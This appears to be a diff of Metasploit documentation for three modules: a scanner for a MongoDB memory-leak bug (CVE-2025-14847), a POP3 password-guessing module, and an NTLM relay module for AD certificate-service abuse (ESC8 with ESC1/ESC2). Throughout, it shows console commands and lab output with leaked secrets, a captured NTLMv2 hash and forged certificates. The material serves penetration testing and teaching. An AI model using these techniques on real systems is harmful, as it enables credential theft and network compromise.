||||
### CHECK
|
||||
Quick vulnerability check using the Wiz Research "magic packet" technique for deterministic vulnerability detection. This action:
|
||||
|
||||
1. Checks the MongoDB version against known vulnerable versions
|
||||
2. Verifies that zlib compression is enabled on the server
|
||||
3. Sends a specially crafted packet that triggers the memory leak
|
||||
4. Analyzes the response for BSON signatures in leaked memory
|
||||
|
||||
This provides a quick, low-impact way to confirm vulnerability without performing a full memory scan.
|
||||
|
||||
```
|
||||
msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > set ACTION CHECK
|
||||
ACTION => CHECK
|
||||
msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > run
|
||||
|
||||
[*] 192.168.1.100:27017 - Running vulnerability check against 192.168.1.100:27017...
|
||||
[*] 192.168.1.100:27017 - MongoDB version: 7.0.14
|
||||
[+] 192.168.1.100:27017 - Version 7.0.14 appears vulnerable, confirming with probe...
|
||||
[*] 192.168.1.100:27017 - Server compressors: zlib, snappy
|
||||
[*] 192.168.1.100:27017 - Sending Wiz magic packet to confirm vulnerability...
|
||||
[+] 192.168.1.100:27017 - VULNERABLE - Server leaks memory via CVE-2025-14847 (MongoDB 7.0.14)
|
||||
```
|
||||
|
||||
## Options
|
||||
|
||||
### MIN_OFFSET
|
||||
@@ -95,13 +69,15 @@ Padding added to the claimed uncompressed buffer size. Default: `500`
|
||||
Minimum bytes to report as an interesting leak in the output. Default: `10`
|
||||
|
||||
### QUICK_SCAN
|
||||
Enable quick scan mode which samples key offsets (power-of-2 boundaries, etc.) instead of scanning every offset. Much faster but may miss some leaks. Default: `false`
|
||||
Enable quick scan mode which samples key offsets (power-of-2 boundaries, etc.) instead of scanning every offset. Much faster but may
|
||||
miss some leaks. Default: `false`
|
||||
|
||||
### REPEAT
|
||||
Number of scan passes to perform. Memory contents change over time, so multiple passes can capture more data. Default: `1`
|
||||
|
||||
### REUSE_CONNECTION
|
||||
Reuse TCP connection for faster scanning. When enabled, the module maintains a persistent connection instead of reconnecting for each probe. This can improve scanning speed by 10-50x. Default: `true`
|
||||
Reuse TCP connection for faster scanning. When enabled, the module maintains a persistent connection instead of reconnecting for each
|
||||
probe. This can improve scanning speed by 10-50x. Default: `true`
|
||||
|
||||
## Advanced Options
|
||||
|
||||
@@ -124,29 +100,38 @@ Show progress every N offsets. Set to 0 to disable. Default: `500`
|
||||
Save all raw MongoDB responses to a separate loot file for offline analysis with tools like `strings`, `binwalk`, etc. Default: `false`
|
||||
|
||||
### SAVE_JSON
|
||||
Save leaked data as a JSON report with full metadata including offsets, timestamps, base64-encoded data, and detected secrets. Useful for automated processing or integration with other tools. Default: `true`
|
||||
Save leaked data as a JSON report with full metadata including offsets, timestamps, base64-encoded data, and detected secrets. Useful
|
||||
for automated processing or integration with other tools. Default: `true`
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Using the CHECK Action
|
||||
### Vulnerability Check
|
||||
|
||||
The module supports the standard `check` command. It fingerprints the MongoDB version, verifies zlib compression is enabled, and sends
|
||||
a crafted magic packet to confirm exploitability.
|
||||
|
||||
```
|
||||
msf6 > use auxiliary/scanner/mongodb/cve_2025_14847_mongobleed
|
||||
msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > set RHOSTS 192.168.1.100
|
||||
RHOSTS => 192.168.1.100
|
||||
msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > set ACTION CHECK
|
||||
ACTION => CHECK
|
||||
msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > run
|
||||
msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > check
|
||||
|
||||
[*] 192.168.1.100:27017 - Running vulnerability check against 192.168.1.100:27017...
|
||||
[*] 192.168.1.100:27017 - MongoDB version: 7.0.14
|
||||
[+] 192.168.1.100:27017 - Version 7.0.14 appears vulnerable, confirming with probe...
|
||||
[*] 192.168.1.100:27017 - Server compressors: zlib, snappy
|
||||
[*] 192.168.1.100:27017 - Sending Wiz magic packet to confirm vulnerability...
|
||||
[+] 192.168.1.100:27017 - VULNERABLE - Server leaks memory via CVE-2025-14847 (MongoDB 7.0.14)
|
||||
[+] 192.168.1.100:27017 - The target is vulnerable. Server leaks memory via crafted OP_COMPRESSED message (MongoDB 4.4.26)
|
||||
```
|
||||
|
||||
### MongoDB 7.0.14 on Linux (with Connection Reuse)
|
||||
When pointed at a non-MongoDB service, the check correctly identifies it as not vulnerable:
|
||||
|
||||
```
|
||||
msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > set RHOSTS 192.168.1.200
|
||||
RHOSTS => 192.168.1.200
|
||||
msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > set RPORT 80
|
||||
RPORT => 80
|
||||
msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > check
|
||||
|
||||
[-] 192.168.1.200:80 - The target is not exploitable. Target does not appear to be a MongoDB service
|
||||
```
|
||||
|
||||
### MongoDB 4.4.26 on Windows
|
||||
|
||||
```
|
||||
msf6 > use auxiliary/scanner/mongodb/cve_2025_14847_mongobleed
|
||||
@@ -154,26 +139,25 @@ msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > set RHOSTS 192.168.1
|
||||
RHOSTS => 192.168.1.100
|
||||
msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > run
|
||||
|
||||
[*] 192.168.1.100:27017 - MongoDB version: 7.0.14
|
||||
[+] 192.168.1.100:27017 - Version 7.0.14 is VULNERABLE to CVE-2025-14847
|
||||
[*] 192.168.1.100:27017 - Server compressors: zlib, snappy
|
||||
[*] 192.168.1.100:27017 - MongoDB version: 4.4.26
|
||||
[+] 192.168.1.100:27017 - Version 4.4.26 is VULNERABLE to CVE-2025-14847
|
||||
[*] 192.168.1.100:27017 - Server compressors: zlib
|
||||
[*] 192.168.1.100:27017 - Connection reuse enabled for faster scanning
|
||||
[*] 192.168.1.100:27017 - Scanning 8173 offsets (20-8192, step=1)
|
||||
[+] 192.168.1.100:27017 - offset=20 len=82 : [conn38248] end connection 10.0.0.5:36845 (0 connections now open)
|
||||
[+] 192.168.1.100:27017 - offset=163 len=617 : driver: { name: "mongoc / ext-mongodb:PHP ", version: "1.24.3" }
|
||||
[+] 192.168.1.100:27017 - offset=501 len=40 : id bson type in element with field name
|
||||
[*] 192.168.1.100:27017 - Progress: 500/8173 (6.1%) - 7 leaks found - ETA: 49s
|
||||
[+] 192.168.1.100:27017 - offset=77 len=39 : conn38248] end connection 10.0.0.5:36845
|
||||
[*] 192.168.1.100:27017 - Progress: 500/8173 (6.1%) - 3 leaks found - ETA: 49s
|
||||
[+] 192.168.1.100:27017 - offset=757 len=12 : password=abc
|
||||
[!] 192.168.1.100:27017 - Secret pattern detected at offset 757: 'password' in context: ...config: { password=abc123&user=admin...
|
||||
[*] 192.168.1.100:27017 - Progress: 1000/8173 (12.2%) - 11 leaks found - ETA: 42s
|
||||
[!] 192.168.1.100:27017 - Secret pattern detected at offset 757: 'password'
|
||||
[*] 192.168.1.100:27017 - Progress: 1000/8173 (12.2%) - 5 leaks found - ETA: 42s
|
||||
...
|
||||
|
||||
[!] 192.168.1.100:27017 - Potential secrets detected:
|
||||
[!] 192.168.1.100:27017 - - Pattern 'password' at offset 757 (pos 12): ...config: { password=abc123&user=admin...
|
||||
[!] 192.168.1.100:27017 - - Pattern 'password' at offset 757
|
||||
|
||||
[+] 192.168.1.100:27017 - Total leaked: 1703 bytes
|
||||
[+] 192.168.1.100:27017 - Unique fragments: 13
|
||||
[+] 192.168.1.100:27017 - Total leaked: 703 bytes
|
||||
[+] 192.168.1.100:27017 - Unique fragments: 8
|
||||
[+] 192.168.1.100:27017 - Leaked data saved to: /root/.msf4/loot/20251230_mongobleed.bin
|
||||
[+] 192.168.1.100:27017 - JSON report saved to: /root/.msf4/loot/20251230_mongobleed.json
|
||||
[*] 192.168.1.100:27017 - Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
||||
@@ -182,12 +166,15 @@ msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > run
|
||||
|
||||
```
|
||||
msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > set RHOSTS 192.168.1.100
|
||||
RHOSTS => 192.168.1.100
|
||||
msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > set REPEAT 3
|
||||
REPEAT => 3
|
||||
msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > set MAX_OFFSET 16384
|
||||
MAX_OFFSET => 16384
|
||||
msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > run
|
||||
|
||||
[*] 192.168.1.100:27017 - MongoDB version: 7.0.14
|
||||
[+] 192.168.1.100:27017 - Version 7.0.14 is VULNERABLE to CVE-2025-14847
|
||||
[*] 192.168.1.100:27017 - MongoDB version: 4.4.26
|
||||
[+] 192.168.1.100:27017 - Version 4.4.26 is VULNERABLE to CVE-2025-14847
|
||||
[*] 192.168.1.100:27017 - Server compressors: zlib
|
||||
[*] 192.168.1.100:27017 - Running 3 scan passes to maximize data collection...
|
||||
[*] 192.168.1.100:27017 - Connection reuse enabled for faster scanning
|
||||
@@ -211,15 +198,16 @@ msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > run
|
||||
|
||||
```
|
||||
msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > set RHOSTS 192.168.1.100
|
||||
RHOSTS => 192.168.1.100
|
||||
msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > set QUICK_SCAN true
|
||||
QUICK_SCAN => true
|
||||
msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > run
|
||||
|
||||
[*] 192.168.1.100:27017 - MongoDB version: 7.0.14
|
||||
[+] 192.168.1.100:27017 - Version 7.0.14 is VULNERABLE to CVE-2025-14847
|
||||
[*] 192.168.1.100:27017 - MongoDB version: 4.4.26
|
||||
[+] 192.168.1.100:27017 - Version 4.4.26 is VULNERABLE to CVE-2025-14847
|
||||
[*] 192.168.1.100:27017 - Server compressors: zlib
|
||||
[*] 192.168.1.100:27017 - Connection reuse enabled for faster scanning
|
||||
[*] 192.168.1.100:27017 - Scanning 97 offsets (20-8192, step=1, quick mode)
|
||||
[+] 192.168.1.100:27017 - offset=20 len=45 : connection string fragment...
|
||||
[+] 192.168.1.100:27017 - offset=128 len=23 : mongodb://admin:pass...
|
||||
|
||||
[+] 192.168.1.100:27017 - Total leaked: 234 bytes
|
||||
@@ -228,33 +216,52 @@ msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > run
|
||||
[+] 192.168.1.100:27017 - JSON report saved to: /root/.msf4/loot/20251230_mongobleed.json
|
||||
```
|
||||
|
||||
### Server Without zlib Compression
|
||||
|
||||
```
|
||||
msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > check rhost=192.168.123.144
|
||||
|
||||
[*] 192.168.123.144:27017 - The target is not exploitable. Server does not have zlib compression enabled (MongoDB 4.4.26)
|
||||
|
||||
msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > run rhost=192.168.123.144
|
||||
|
||||
[*] 192.168.123.144:27017 - MongoDB version: 4.4.26
|
||||
[+] 192.168.123.144:27017 - Version 4.4.26 is VULNERABLE to CVE-2025-14847
|
||||
[*] 192.168.123.144:27017 - Server compressors: none
|
||||
[-] 192.168.123.144:27017 - Server does not support zlib compression - vulnerability not exploitable
|
||||
[*] 192.168.123.144:27017 - The CVE-2025-14847 vulnerability requires zlib compression to be enabled
|
||||
[*] 192.168.123.144:27017 - Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
||||
|
||||
### JSON Report Output
|
||||
|
||||
The JSON report includes full metadata for each leak:
|
||||
When `SAVE_JSON` is enabled (the default), the module saves a structured JSON report alongside the raw loot. This includes full
|
||||
metadata for each leak fragment:
|
||||
|
||||
```json
|
||||
{
|
||||
"scan_info": {
|
||||
"target": "192.168.1.100",
|
||||
"port": 27017,
|
||||
"mongodb_version": "7.0.14",
|
||||
"mongodb_version": "4.4.26",
|
||||
"scan_time": "2025-12-30T14:30:00Z",
|
||||
"cve": "CVE-2025-14847"
|
||||
},
|
||||
"summary": {
|
||||
"total_leaks": 13,
|
||||
"total_bytes": 1703,
|
||||
"secrets_found": 2
|
||||
"total_leaks": 8,
|
||||
"total_bytes": 703,
|
||||
"secrets_found": 1
|
||||
},
|
||||
"secrets": [
|
||||
"Pattern 'password' at offset 757..."
|
||||
],
|
||||
"leaks": [
|
||||
{
|
||||
"offset": 20,
|
||||
"length": 82,
|
||||
"data_base64": "W2Nvbm4zODI0OF0gZW5kIGNvbm5lY3Rpb24...",
|
||||
"data_printable": "[conn38248] end connection 10.0.0.5:36845...",
|
||||
"offset": 77,
|
||||
"length": 39,
|
||||
"data_base64": "Y29ubjM4MjQ4XSBlbmQgY29ubmVjdGlvbi4uLg==",
|
||||
"data_printable": "conn38248] end connection 10.0.0.5:36845",
|
||||
"has_secret": false,
|
||||
"timestamp": "2025-12-30T14:30:01Z"
|
||||
}
|
||||
@@ -262,8 +269,9 @@ The JSON report includes full metadata for each leak:
|
||||
}
|
||||
```
|
||||
|
||||
You can process the JSON with standard tools:
|
||||
```bash
|
||||
The JSON report can be processed with standard tools:
|
||||
|
||||
```
|
||||
# Extract all leaked data
|
||||
cat mongobleed.json | jq -r '.leaks[].data_printable'
|
||||
|
||||
@@ -278,43 +286,33 @@ cat mongobleed.json | jq '.summary'
|
||||
|
||||
```
|
||||
msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > set RHOSTS 192.168.1.100
|
||||
RHOSTS => 192.168.1.100
|
||||
msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > set SAVE_RAW_RESPONSES true
|
||||
SAVE_RAW_RESPONSES => true
|
||||
msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > run
|
||||
|
||||
[*] 192.168.1.100:27017 - MongoDB version: 7.0.14
|
||||
[+] 192.168.1.100:27017 - Version 7.0.14 is VULNERABLE to CVE-2025-14847
|
||||
[*] 192.168.1.100:27017 - MongoDB version: 4.4.26
|
||||
[+] 192.168.1.100:27017 - Version 4.4.26 is VULNERABLE to CVE-2025-14847
|
||||
...
|
||||
|
||||
[+] 192.168.1.100:27017 - Total leaked: 1703 bytes
|
||||
[+] 192.168.1.100:27017 - Unique fragments: 13
|
||||
[+] 192.168.1.100:27017 - Total leaked: 703 bytes
|
||||
[+] 192.168.1.100:27017 - Unique fragments: 8
|
||||
[+] 192.168.1.100:27017 - Leaked data saved to: /root/.msf4/loot/20251230_mongobleed.bin
|
||||
[+] 192.168.1.100:27017 - Raw responses saved to: /root/.msf4/loot/20251230_mongobleed_raw.bin
|
||||
```
|
||||
|
||||
You can then analyze the raw responses offline:
|
||||
```bash
|
||||
|
||||
```
|
||||
strings /root/.msf4/loot/20251230_mongobleed_raw.bin | grep -i password
|
||||
```
|
||||
|
||||
### Server Without zlib Compression
|
||||
|
||||
```
|
||||
msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > set RHOSTS 192.168.1.100
|
||||
msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > run
|
||||
|
||||
[*] 192.168.1.100:27017 - MongoDB version: 7.0.14
|
||||
[+] 192.168.1.100:27017 - Version 7.0.14 is VULNERABLE to CVE-2025-14847
|
||||
[*] 192.168.1.100:27017 - Server compressors: snappy
|
||||
[-] 192.168.1.100:27017 - Server does not support zlib compression - vulnerability not exploitable
|
||||
[*] 192.168.1.100:27017 - The CVE-2025-14847 vulnerability requires zlib compression to be enabled
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
||||
|
||||
## Technical Details
|
||||
|
||||
### How the Vulnerability Works
|
||||
|
||||
The vulnerability exists in MongoDB's `message_compressor_zlib.cpp`. The bug was caused by returning `output.length()` (the allocated buffer size) instead of the actual decompressed data length. This allowed attackers to:
|
||||
The vulnerability exists in MongoDB's `message_compressor_zlib.cpp`. The bug was caused by returning `output.length()` (the allocated
|
||||
buffer size) instead of the actual decompressed data length. This allowed attackers to:
|
||||
|
||||
1. Send a compressed message claiming a large uncompressed size
|
||||
2. MongoDB allocates a buffer based on the claimed size
|
||||
@@ -324,7 +322,12 @@ The vulnerability exists in MongoDB's `message_compressor_zlib.cpp`. The bug was
|
||||
|
||||
### Detection Technique
|
||||
|
||||
The Wiz Research "magic packet" used in the `check` method sends a minimal BSON document `{"a": 1}` inside a malformed `OP_COMPRESSED` message with an inflated `uncompressedSize` field. If the server responds with BSON signatures or field name errors containing unexpected data, the vulnerability is confirmed.
|
||||
The Wiz Research "magic packet" used in the `check` command sends a minimal BSON document `{"a": 1}` inside a malformed
|
||||
`OP_COMPRESSED` message with an inflated `uncompressedSize` field. If the server responds with BSON parsing errors, the vulnerability
|
||||
is confirmed, since a patched server rejects the inflated size before parsing.
|
||||
|
||||
The module validates that the target is actually a MongoDB service before probing, preventing false positives against non-MongoDB
|
||||
services. Standard MongoDB error message strings are filtered from leak results to avoid reporting server error text as leaked memory.
|
||||
|
||||
## References
|
||||
|
||||
|
||||
@@ -0,0 +1,127 @@
|
||||
## Vulnerable Application
|
||||
|
||||
POP3 is an application-layer Internet standard protocol used by e-mail clients
|
||||
to retrieve e-mail from a mail server.
|
||||
|
||||
This module in particular attempts to authenticate to a POP3 service.
|
||||
The default wordlists are:
|
||||
- [unix_users.txt](https://github.com/rapid7/metasploit-framework/blob/master/data/wordlists/unix_users.txt) for users and
|
||||
- [unix_passwords.txt](https://github.com/rapid7/metasploit-framework/blob/master/data/wordlists/unix_passwords.txt) for passowords
|
||||
## Verification Steps
|
||||
|
||||
1. Install and configure a pop3 server (ex: with dovecot)
|
||||
2. Start msfconsole
|
||||
3. Do: `use auxiliary/scanner/pop3/pop3_login`
|
||||
4. Do: `set rhosts [IP]`
|
||||
5. Do: `run`
|
||||
|
||||
## Options
|
||||
|
||||
### ANONYMOUS_LOGIN
|
||||
|
||||
Attempt to login with a blank username and password
|
||||
|
||||
### BLANK_PASSWORDS
|
||||
|
||||
Try blank passwords for all users
|
||||
|
||||
### BRUTEFORCE_SPEED
|
||||
|
||||
How fast to bruteforce, from 0 to 5
|
||||
|
||||
### DB_ALL_CREDS
|
||||
|
||||
Try each user/password couple stored in the current database
|
||||
|
||||
### DB_ALL_PASS
|
||||
|
||||
Add all passwords in the current database to the list
|
||||
|
||||
### DB_ALL_USERS
|
||||
|
||||
Add all users in the current database to the list
|
||||
|
||||
### DB_SKIP_EXISTING
|
||||
|
||||
Skip existing credentials stored in the current database (Accepted: none, user, user&realm)
|
||||
|
||||
### PASSWORD
|
||||
|
||||
A specific password to authenticate with
|
||||
|
||||
### PASS_FILE
|
||||
|
||||
Newline separated list of probable users passwords. Default depends on install location,
|
||||
however it will be within metasploit-framework/data/wordlists/unix_passwords.txt
|
||||
|
||||
### STOP_ON_SUCCESS
|
||||
|
||||
Stop guessing when a credential works for a host
|
||||
|
||||
### THREADS
|
||||
|
||||
The number of concurrent threads (max one per host)
|
||||
|
||||
### USERNAME
|
||||
|
||||
A specific username to authenticate as
|
||||
|
||||
### USERPASS_FILE
|
||||
|
||||
File containing users and pass words separated by space, one pair per line
|
||||
|
||||
### USER_AS_PASS
|
||||
|
||||
Try the username as the password for all users
|
||||
|
||||
|
||||
### USER_FILE
|
||||
|
||||
Newline separated list of probable users accounts. Default depends on install location,
|
||||
however it will be within metasploit-framework/data/wordlists/unix_users.txt
|
||||
|
||||
|
||||
### VERBOSE
|
||||
|
||||
Whether to print output for all attempts
|
||||
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Dovecot on Kali-Linux
|
||||
|
||||
|
||||
|
||||
|
||||
First we need to install an email server, here we will use dovecot:
|
||||
|
||||
- `sudo apt install dovecot-core dovecot-pop3d` version 2.3 will be installed
|
||||
|
||||
Then we can configure it
|
||||
|
||||
- In /etc/dovecot/dovecot.conf uncomment the line `#protocols = pop3 imap lmtp`
|
||||
|
||||
- In /etc/dovecot/conf.d/10-ssl.conf change the line `ssl = yes` to `ssl = no` (obviously this is bad practice)
|
||||
|
||||
Then we create a new user
|
||||
|
||||
- `sudo useradd -m alice && echo "alice:password123" | sudo chpasswd`
|
||||
|
||||
We can now start the server with `sudo systemctl start dovecot`
|
||||
|
||||
Now we can go into msfconsole:
|
||||
|
||||
```
|
||||
msf > use auxiliary/scanner/pop3/pop3_login
|
||||
msf auxiliary(scanner/pop3/pop3_login) > set rhosts 127.0.0.1
|
||||
rhosts => 127.0.0.1
|
||||
msf auxiliary(scanner/pop3/pop3_login) > set username alice
|
||||
username => alice
|
||||
msf auxiliary(scanner/pop3/pop3_login) > set password password123
|
||||
password => password123
|
||||
msf auxiliary(scanner/pop3/pop3_login) > run
|
||||
[+] 127.0.0.1:110 - 127.0.0.1:110 - Success: 'alice:password123' '+OK Logged in. '
|
||||
[!] 127.0.0.1:110 - No active DB -- Credential data will not be saved!
|
||||
[*] 127.0.0.1:110 - Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
||||
@@ -33,9 +33,60 @@ The template to issue if MODE is SPECIFIC_TEMPLATE.
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Version and OS
|
||||
### NTLM
|
||||
|
||||
```
|
||||
msf auxiliary(server/relay/esc8) > show options
|
||||
|
||||
Module options (auxiliary/server/relay/esc8):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
ALT_DNS no Alternative certificate DNS
|
||||
ALT_SID no Alternative object SID
|
||||
ALT_UPN Administrator@example.com no Alternative certificate UPN (format: USER@DOMAIN)
|
||||
CAINPWFILE no Name of file to store Cain&Abel hashes in. Only supports NTLMv1 hashes. Can
|
||||
be a path.
|
||||
JOHNPWFILE no Name of file to store JohnTheRipper hashes in. Supports NTLMv1 and NTLMv2 ha
|
||||
shes, each of which is stored in separate files. Can also be a path.
|
||||
MODE SPECIFIC_TEMPLATE yes The issue mode. (Accepted: ALL, AUTO, QUERY_ONLY, SPECIFIC_TEMPLATE)
|
||||
ON_BEHALF_OF no Username to request on behalf of (format: DOMAIN\USER)
|
||||
PFX no Certificate to request on behalf of
|
||||
Proxies no A proxy chain of format type:host:port[,type:host:port][...]. Supported prox
|
||||
ies: socks5h, sapni, socks4, http, socks5
|
||||
RELAY_TIMEOUT 25 yes Seconds that the relay socket will wait for a response after the client has
|
||||
initiated communication.
|
||||
RHOSTS 10.5.132.180 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/ba
|
||||
sics/using-metasploit.html
|
||||
RPORT 80 yes The target port (TCP)
|
||||
SMBDomain WORKGROUP yes The domain name used during SMB exchange.
|
||||
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on
|
||||
the local machine or 0.0.0.0 to listen on all addresses.
|
||||
SRVPORT 445 yes The local port to listen on.
|
||||
SRV_TIMEOUT 25 yes Seconds that the server socket will wait for a response after the client has
|
||||
initiated communication.
|
||||
SSL false no Negotiate SSL/TLS for outgoing connections
|
||||
TARGETURI /certsrv/ yes The URI for the cert server.
|
||||
VHOST no HTTP server virtual host
|
||||
|
||||
|
||||
When MODE is SPECIFIC_TEMPLATE:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
CERT_TEMPLATE ESC1-Template no The template to issue if MODE is SPECIFIC_TEMPLATE.
|
||||
|
||||
|
||||
Auxiliary action:
|
||||
|
||||
Name Description
|
||||
---- -----------
|
||||
Relay Run SMB ESC8 relay server
|
||||
|
||||
|
||||
|
||||
View the full module info with the info, or info -d command.
|
||||
|
||||
msf auxiliary(server/relay/esc8) > run
|
||||
[*] Auxiliary module running as background job 1.
|
||||
msf auxiliary(server/relay/esc8) >
|
||||
@@ -63,3 +114,157 @@ msf auxiliary(server/relay/esc8) >
|
||||
[*] Received request for MSFLAB\smcintyre
|
||||
[*] Identity: MSFLAB\smcintyre - All targets relayed to
|
||||
```
|
||||
|
||||
|
||||
### NTLM and ESC1
|
||||
|
||||
```
|
||||
msf auxiliary(server/relay/esc8) > show options
|
||||
|
||||
Module options (auxiliary/server/relay/esc8):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
ALT_DNS no Alternative certificate DNS
|
||||
ALT_SID no Alternative object SID
|
||||
ALT_UPN Administrator@example.com no Alternative certificate UPN (format: USER@DOMAIN)
|
||||
CAINPWFILE no Name of file to store Cain&Abel hashes in. Only supports NTLMv1 hashes. Can
|
||||
be a path.
|
||||
JOHNPWFILE no Name of file to store JohnTheRipper hashes in. Supports NTLMv1 and NTLMv2 ha
|
||||
shes, each of which is stored in separate files. Can also be a path.
|
||||
MODE SPECIFIC_TEMPLATE yes The issue mode. (Accepted: ALL, AUTO, QUERY_ONLY, SPECIFIC_TEMPLATE)
|
||||
ON_BEHALF_OF no Username to request on behalf of (format: DOMAIN\USER)
|
||||
PFX no Certificate to request on behalf of
|
||||
Proxies no A proxy chain of format type:host:port[,type:host:port][...]. Supported prox
|
||||
ies: socks5h, sapni, socks4, http, socks5
|
||||
RELAY_TIMEOUT 25 yes Seconds that the relay socket will wait for a response after the client has
|
||||
initiated communication.
|
||||
RHOSTS 10.5.132.180 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/ba
|
||||
sics/using-metasploit.html
|
||||
RPORT 80 yes The target port (TCP)
|
||||
SMBDomain WORKGROUP yes The domain name used during SMB exchange.
|
||||
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on
|
||||
the local machine or 0.0.0.0 to listen on all addresses.
|
||||
SRVPORT 445 yes The local port to listen on.
|
||||
SRV_TIMEOUT 25 yes Seconds that the server socket will wait for a response after the client has
|
||||
initiated communication.
|
||||
SSL false no Negotiate SSL/TLS for outgoing connections
|
||||
TARGETURI /certsrv/ yes The URI for the cert server.
|
||||
VHOST no HTTP server virtual host
|
||||
|
||||
|
||||
When MODE is SPECIFIC_TEMPLATE:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
CERT_TEMPLATE ESC1-Template no The template to issue if MODE is SPECIFIC_TEMPLATE.
|
||||
|
||||
|
||||
Auxiliary action:
|
||||
|
||||
Name Description
|
||||
---- -----------
|
||||
Relay Run SMB ESC8 relay server
|
||||
|
||||
|
||||
|
||||
View the full module info with the info, or info -d command.
|
||||
|
||||
msf auxiliary(server/relay/esc8) > run
|
||||
[*] Auxiliary module running as background job 0.
|
||||
msf auxiliary(server/relay/esc8) >
|
||||
[*] SMB Server is running. Listening on 0.0.0.0:445
|
||||
[*] Server started.
|
||||
[*] New request from 10.5.132.122
|
||||
[*] Received request for \msfuser
|
||||
[*] Relaying to next target http://10.5.132.180:80/certsrv/
|
||||
[+] Identity: \msfuser - Successfully authenticated against relay target http://10.5.132.180:80/certsrv/
|
||||
[SMB] NTLMv2-SSP Client : 10.5.132.180
|
||||
[SMB] NTLMv2-SSP Username : \msfuser
|
||||
[SMB] NTLMv2-SSP Hash : msfuser:::af0b69bf0b95c55e:db5ce84b2f41b82d7df93bd2566c06b6:0101000000000000cbf836e63587dc013ce37255fbca75410000000002000e004500580041004d0050004c00450001001e00570049004e002d00440052004300390048004300440049004d0041005400040016006500780061006d0070006c0065002e0063006f006d0003003600570049004e002d00440052004300390048004300440049004d00410054002e006500780061006d0070006c0065002e0063006f006d00050016006500780061006d0070006c0065002e0063006f006d0007000800cbf836e63587dc01060004000200000008003000300000000000000000000000003000002ad3656a59fe53f773d5bc3852373338e1f3270cdbdf9411b84ef184151925510a001000000000000000000000000000000000000900220063006900660073002f00310030002e0035002e003100330035002e003200300031000000000000000000
|
||||
|
||||
[+] Certificate generated using template ESC1-Template and \msfuser
|
||||
[+] Certificate for \msfuser using template ESC1-Template saved to /home/tmoose/.msf4/loot/20260116161729_default_10.5.132.180_windows.ad.cs_994769.pfx
|
||||
[*] Received request for \msfuser
|
||||
[*] Identity: \msfuser - All targets relayed to
|
||||
|
||||
```
|
||||
|
||||
### NTLM and ESC2
|
||||
```msf
|
||||
msf auxiliary(server/relay/esc8) > show options
|
||||
|
||||
Module options (auxiliary/server/relay/esc8):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
ALT_DNS no Alternative certificate DNS
|
||||
ALT_SID no Alternative object SID
|
||||
ALT_UPN no Alternative certificate UPN (format: USER@DOMAIN)
|
||||
CAINPWFILE no Name of file to store Cain&Abel hashes in. Only supports NTLMv1 h
|
||||
ashes. Can be a path.
|
||||
JOHNPWFILE no Name of file to store JohnTheRipper hashes in. Supports NTLMv1 an
|
||||
d NTLMv2 hashes, each of which is stored in separate files. Can a
|
||||
lso be a path.
|
||||
MODE SPECIFIC_TEMPLATE yes The issue mode. (Accepted: ALL, AUTO, QUERY_ONLY, SPECIFIC_TEMPLA
|
||||
TE)
|
||||
ON_BEHALF_OF EXAMPLE\Administrator no Username to request on behalf of (format: DOMAIN\USER)
|
||||
PFX /home/tmoose/.msf4/loot/202601161509 no Certificate to request on behalf of
|
||||
11_default_10.5.132.180_windows.ad.c
|
||||
s_854591.pfx
|
||||
Proxies no A proxy chain of format type:host:port[,type:host:port][...]. Sup
|
||||
ported proxies: socks5h, sapni, socks4, http, socks5
|
||||
RELAY_TIMEOUT 25 yes Seconds that the relay socket will wait for a response after the
|
||||
client has initiated communication.
|
||||
RHOSTS 10.5.132.180 yes The target host(s), see https://docs.metasploit.com/docs/using-me
|
||||
tasploit/basics/using-metasploit.html
|
||||
RPORT 80 yes The target port (TCP)
|
||||
SMBDomain WORKGROUP yes The domain name used during SMB exchange.
|
||||
